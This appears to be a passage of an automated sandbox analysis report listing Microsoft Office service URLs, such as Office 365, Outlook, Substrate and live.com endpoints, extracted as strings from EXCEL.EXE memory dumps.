      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonHNz
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonY
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookJ
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pages.store.office.com/review/query
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonMBI_SSLpeople.directory.
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonD
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonMBI_SSL_SHORTssl.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
      Source: EXCEL.EXE, 00000000.00000002.543373563.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://powerlift-user.acompli.net
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://powerlift.acompli.net
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://powerlift.acompli.netSubstrateOfficeIntelligenceInsightsServicehttps://
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonP
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
      Source: EXCEL.EXE, 00000000.00000003.263403796.00000000131C8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://roaming.edog.
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.comBU
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://settings.outlook.com
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comS
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://shell.suite.office.com:1443
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://skyapi.live.net/Activity/
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/worko
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://staging.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://staging.cortana.airla
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://store.office.cn/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://store.office.de/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com#D8
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistoryMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com/search/api/v2/initMBI_SSL
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.com1
      Source: EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comP
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comS
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comW
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.coma
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comc-
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://substrate.office.comg
      Source: EXCEL.EXE, 00000000.00000003.260270306.0000000012FD9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://tasks.office.com
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpString found in binary or memory: https://tasks.office.comst
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://tellmeservice.osi.office.netst
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.htmlInsightsImmersivehttps
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
